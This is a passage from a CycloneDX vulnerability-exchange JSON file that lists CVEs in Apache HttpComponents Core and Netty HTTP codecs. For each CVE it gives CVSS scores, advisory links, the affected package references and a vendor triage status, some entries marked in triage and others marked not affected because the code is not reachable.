          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#9844124f-79df-47ff-b3f6-963fe25c39cd"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#b4331dac-9fc2-4b9b-a1a5-9fd6bc457c1a"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#fd0eaefe-899e-4f80-9de1-bbf517108cac"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#fecb1cd1-e810-409d-b12b-917c2316a3a1"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#cc96a034-b20d-4faf-ac07-3f686d6a9293"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#d8a06ffe-122d-4f22-bd9a-0f7aa2e51603"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#cae5cb38-3e76-4135-b4eb-4c8a4e2872fb"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#f9a13a77-a675-43a2-b4e2-58ea267c47e7"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#c68df376-deb1-43bd-bacc-450f7886973b"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#fdeacae5-d555-4c85-8005-baf89613d5bf"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fb0d9682-7f15-422f-9990-9dc3847c4c4c"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#d8be36a3-cc1b-4ea6-bd4a-69a2c59c6365"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#ededdc6b-bc00-436a-83e2-8b7204908319"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f74bdc68-36e0-445e-87e1-fe34ba6ae4a1"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#9d804633-eb3e-4bab-af6a-1c7cdec1fd0f"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#e9a5161f-75f8-480f-92e7-180ad803fcd7"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.3.4"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#d176ef7f-b3d4-454c-934b-0ecdecc432e4"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5@5.0.2"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-54428",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        770
      ],
      "description": "Allocation of resources without limits or throttling in the HTTP/2 HPACK decoder in Apache HttpComponents Core (5.4.2 and earlier, 5.5-beta1 and earlier) allows an remote attacker to cause a denial of service through memory exhaustion by sending oversized compressed header blocks before the HTTP/2 SETTINGS acknowledgement causes the configured header list size limit to be applied.",
      "recommendation": "Upgrade org.apache.httpcomponents.core5:httpcore5-h2 to version 5.4.3, 5.5-beta2",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-54428"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/07/01/3"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-54428"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/1ea1239bbbe3442a8382a87279c0a8119a7e358e"
        },
        {
          "url": "https://github.com/apache/httpcomponents-core/commit/cc30ee058a7b10cbf4ad3dd6270ab6d1f6a74c49"
        },
        {
          "url": "https://lists.apache.org/thread/5zjp8vczvxq19pw2rvhs21q446bhl0sd"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-54428"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-54428"
        }
      ],
      "published": "2026-07-01T18:16:34+00:00",
      "updated": "2026-07-24T20:03:41+00:00",
      "affects": [
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4",
          "versions": [
            {
              "version": "5.3.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4",
          "versions": [
            {
              "version": "5.3.4",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2",
          "versions": [
            {
              "version": "5.0.2",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#f67060f6-22cf-4235-bed2-f264d12157fd"
        },
        {
          "ref": "urn:cdx:1c2d07e7-bc46-4c64-85c9-cf1f4b389599/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#c90e2c79-8299-4145-9b99-2278d048eb00"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#e6acfc32-5025-4233-bbe4-d7f85ca8fada"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#a4ca2e02-8ae7-49c8-b38e-752bfaf32363"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#3f394697-1485-4977-819f-f4547be1cd3c"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#fadca998-9035-4a49-b4a7-bedd2d9becb8"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#e087465a-9c2f-4a11-a82c-ced1fed057ab"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#e0e761c6-e915-4833-af38-56462d50753e"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#c4cd9d41-e2fd-4329-8567-51ffe0820de0"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#ffdef24f-3d1b-423a-a461-d209f825a148"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#db9033a5-a220-41e7-b790-be9e0b09b688"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#928bb63c-246c-4110-be64-9edb6338a4aa"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#96fad919-74b5-41b4-9347-817595b76fcd"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#f67682c2-e29a-4c3a-a90f-1b47ab55f89e"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#d100b3ee-4694-4c86-8d4d-3a47ea73f21a"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#c027c377-7115-4735-aa6e-eca9194d3123"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f6bbcd36-b7b7-4a61-a785-47cf979c87e9"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#f218b70d-3915-40d4-9e91-c0e624a5a045"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#e9857885-fdf7-4cb1-a5f1-6b460a20b376"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#fe63971f-6336-46ec-8f9a-51cc44156a5c"
        },
        {
          "ref": "urn:cdx:06038188-97d8-41d2-9628-e010b37a600d/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.3.4"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#bf6b2e63-af63-4558-b88e-90323ccfa64b"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/org.apache.httpcomponents.core5/httpcore5-h2@5.0.2"
        }
      ],
      "analysis": {
        "state": "in_triage",
        "justification": "",
        "response": [],
        "detail": "This CVE is under investigation by Confluent."
      }
    },
    {
      "id": "CVE-2026-55831",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400,
        770
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Prior to 4.1.136.Final and 4.2.16.Final, Netty's SPDY SETTINGS decoder accepts a peer-declared SETTINGS entry count up to the 24-bit frame-length limit and materializes every unique setting ID in `DefaultSpdySettingsFrame`, allowing a remote SPDY/3.1 peer to send a syntactically valid roughly 2 MiB SETTINGS frame that creates 262144 map entries and amplifies network input into heap growth and ordered-map insertion work. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55831"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55831"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-6jqx-86gh-f27w"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55831"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55831"
        }
      ],
      "published": "2026-07-21T00:17:35+00:00",
      "updated": "2026-07-23T15:17:16+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#b76b6b26-b0c9-4ac8-88af-0e5e14ae23d3"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#fe689fa7-681f-47bb-9e70-fdf1171af8d0"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cae7d5f7-3588-4369-9097-6272034260b2"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f420e16f-30bf-44f9-93ce-a46887770775"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#a5c917b4-0056-4567-9436-e0da979e881b"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e67bf00e-91a6-447e-aee1-ea97dedcee0d"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#9e9577b7-2f21-451d-901d-fff65ea797f9"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#e5898215-a0f7-47fb-ae3c-67a907fe3095"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#a5f42101-6e53-47d2-80ad-32eb668ec13f"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#dcdd13bb-65e3-4cac-a2dd-ba8e06a00846"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#13871a8f-3a1f-4a41-960a-3cac1b9dfa40"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#cfad0975-7df3-4477-b02e-e58461be3833"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fdd467e2-3396-4339-9a0c-2068b1de59cd"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fe3c1679-6d69-4fe3-ae7d-c0a397ed5e60"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#e51e03bf-2ce2-4c6b-99f5-9483acf64cfd"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#ee371009-2545-4e62-924d-88f8de37c156"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#f6fd5979-38ba-4df3-8db0-831120dec4b3"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#7303ed0c-a89f-4e45-baf3-34b53d573e03"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. A comprehensive search across the entire CP repo set found no SPDY codec classes instantiated anywhere, despite the vulnerable netty-codec-http version being present in most repos."
      }
    },
    {
      "id": "CVE-2026-55833",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "ghsa"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. Prior to 4.1.136.Final and 4.2.16.Final, Netty SPDY header decoding continues inflating zlib-compressed header blocks after the raw header parser has exceeded `maxHeaderSize` and marked the frame truncated in `SpdyFrameCodec`, allowing a remote peer to send a small compressed `HEADERS` block that expands into much larger raw header data and causes compression-amplified CPU and allocation churn. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-55833"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-55833"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-mvh2-crg5-v77c"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-55833"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-55833"
        }
      ],
      "published": "2026-07-21T00:17:35+00:00",
      "updated": "2026-07-23T13:34:45+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#b76b6b26-b0c9-4ac8-88af-0e5e14ae23d3"
        },
        {
          "ref": "urn:cdx:970135fe-744c-475b-9f5e-65aa475756fc/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:786f064b-a940-4937-9022-4b9b3ea2938e/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:1927755b-d423-4e30-8d32-4b9c1f7386ae/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:4c40e9d9-e7f5-4ca1-9f62-645e9d880727/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:653f91e3-86f8-4a44-b1b9-2f9103b70aa0/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#fe689fa7-681f-47bb-9e70-fdf1171af8d0"
        },
        {
          "ref": "urn:cdx:42153134-38e9-4c4f-8207-05e638c352d6/1#cae7d5f7-3588-4369-9097-6272034260b2"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3e20bc2e-deb8-49f0-9e54-5b4fbb1643f4/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:2e553233-b96a-4dc4-8633-d363380b776c/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:9b3395c8-2be5-4c05-b29f-c170109a08f7/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:36e98564-957e-4962-9b05-facbaffbff42/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#f420e16f-30bf-44f9-93ce-a46887770775"
        },
        {
          "ref": "urn:cdx:71662f85-b085-4d46-b740-ddd466e189cf/1#a5c917b4-0056-4567-9436-e0da979e881b"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#e67bf00e-91a6-447e-aee1-ea97dedcee0d"
        },
        {
          "ref": "urn:cdx:208a4c7b-c8cb-4983-94da-03702407d748/1#9e9577b7-2f21-451d-901d-fff65ea797f9"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#e5898215-a0f7-47fb-ae3c-67a907fe3095"
        },
        {
          "ref": "urn:cdx:0b878cad-f5e5-4999-9206-674f9598fbff/1#a5f42101-6e53-47d2-80ad-32eb668ec13f"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#dcdd13bb-65e3-4cac-a2dd-ba8e06a00846"
        },
        {
          "ref": "urn:cdx:20a5aa79-52f7-4ee6-93f2-1499f5c95713/1#13871a8f-3a1f-4a41-960a-3cac1b9dfa40"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#cfad0975-7df3-4477-b02e-e58461be3833"
        },
        {
          "ref": "urn:cdx:9772fa70-e816-45d8-85c9-9bc3a8f94937/1#fdd467e2-3396-4339-9a0c-2068b1de59cd"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#fe3c1679-6d69-4fe3-ae7d-c0a397ed5e60"
        },
        {
          "ref": "urn:cdx:637aca81-8d20-432b-9228-ed0878cbc534/1#e51e03bf-2ce2-4c6b-99f5-9483acf64cfd"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#ee371009-2545-4e62-924d-88f8de37c156"
        },
        {
          "ref": "urn:cdx:77b9b59b-ba56-4407-9025-4e050e2b6013/1#f6fd5979-38ba-4df3-8db0-831120dec4b3"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:3ce4581c-161c-4dfa-9a98-040408b3c95f/1#pkg:maven/io.netty/netty-codec-http@4.2.15.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#pkg:maven/io.netty/netty-codec-http@4.1.135.Final"
        },
        {
          "ref": "urn:cdx:ca231814-28ab-4573-b0f8-06ec09601e52/1#7303ed0c-a89f-4e45-baf3-34b53d573e03"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available. A comprehensive search across the entire CP repo set found no SPDY codec classes instantiated anywhere, despite the vulnerable netty-codec-http version being present in most repos."
      }
    },
    {
      "id": "CVE-2026-56745",
      "source": {
        "name": "ghsa",
        "url": "https://github.com/advisories?query=type%3Areviewed+ecosystem%3Amaven"
      },
      "ratings": [
        {
          "source": {
            "name": "nvd"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 7.5,
          "severity": "high",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"
        }
      ],
      "cwes": [
        400
      ],
      "description": "Netty is a network application framework for development of protocol servers and clients. In versions 4.2.0.Final through 4.2.15.Final and 4.1.0.Final through 4.1.135.Final, the `SpdyHttpDecoder` handler in Netty's SPDY-to-HTTP codec allocates a pooled `ByteBuf` when processing a client-initiated `SYN_STREAM` frame with `FLAG_FIN=0` and stores the partially constructed `FullHttpRequest` in `messageMap`; when the remote peer sends `RST_STREAM` for that stream or the accumulated content exceeds `maxContentLength`, the decoder removes the entry but does not release the pooled `ByteBuf`, causing native memory exhaustion. This issue is fixed in versions 4.1.136.Final and 4.2.16.Final.",
      "recommendation": "Upgrade io.netty:netty-codec-http to version 4.2.16.Final, 4.1.136.Final",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2026-56745"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2026-56745"
        },
        {
          "url": "https://github.com/netty/netty"
        },
        {
          "url": "https://github.com/netty/netty/commit/5b68c61f37aa4a3045cba624cbea239655c9003b"
        },
        {
          "url": "https://github.com/netty/netty/commit/bb2ff68a1fb71cb4b0eb9a9e17b66c52aff680c6"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.1.136.Final"
        },
        {
          "url": "https://github.com/netty/netty/releases/tag/netty-4.2.16.Final"
        },
        {
          "url": "https://github.com/netty/netty/security/advisories/GHSA-jppx-w49h-x2qq"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-56745"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-56745"
        }
      ],
      "published": "2026-07-21T22:17:14+00:00",
      "updated": "2026-07-30T14:46:55+00:00",
      "affects": [
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.1.135.Final",
          "versions": [
            {
              "version": "4.1.135.Final",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:maven/io.netty/netty-codec-http@4.2.15.Final",
          "versions": [
            {
              "version": "4.2.15.Final",
              "status": "affected"
            }
          ]
        },
        {
